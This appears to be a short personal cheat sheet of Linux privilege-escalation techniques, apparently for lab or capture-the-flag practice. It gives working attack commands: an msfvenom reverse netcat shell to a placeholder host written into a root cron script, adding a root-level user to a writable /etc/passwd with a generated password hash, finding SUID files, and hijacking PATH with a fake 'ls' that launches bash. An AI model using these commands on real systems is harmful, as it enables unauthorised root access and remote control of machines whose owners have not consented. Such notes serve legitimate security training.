Linux

Resources

Exploiting crontab

cat /etc/crontab

=== CRONTAB FORMAT ===

# = ID
m = Minute
h = Hour
dom = Day of the month
mon = Month
dow = Day of the week
user = What user the command will run as
command = What command should be run

#  m   h dom mon dow user  command

17 *   1  *   *   *  root  cd / && run-parts --report /etc/cron.hourly

We can create an msf venom exploit :

msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R

Then we put it into the right directory which is the target of the cron job : echo [MSFVENOM OUTPUT] > autoscript.sh

Exploiting SUID/GUID files

find / -perm -u=s -type f 2>/dev/null

Exploiting writeable /etc/passwd

First create a compliant password hash using :

openssl passwd -1 -salt [salt] [password]

With the use of new as salt and 123 as password we got this : $1$new$p7ptkEKU1HnaHpRtzNizS1

We can add the user at the end of the passwd file by following this (don't forget to escape $ in the password hash): username:passwordhash:0:0:root:/root:/bin/bash

Exploiting sudo

sudo -l then check GTFOBins

Exploiting PATH variables

echo $PATH

If there is a script executed by root which use the ls command for example, we can write an imitation executable and add it to the PATH environmental variable.

cd /tmp
echo "/bin/bash" > ls
chmod +x ls
export PATH=/tmp:$PATH

To reset the PATH variable, remove the tmp path.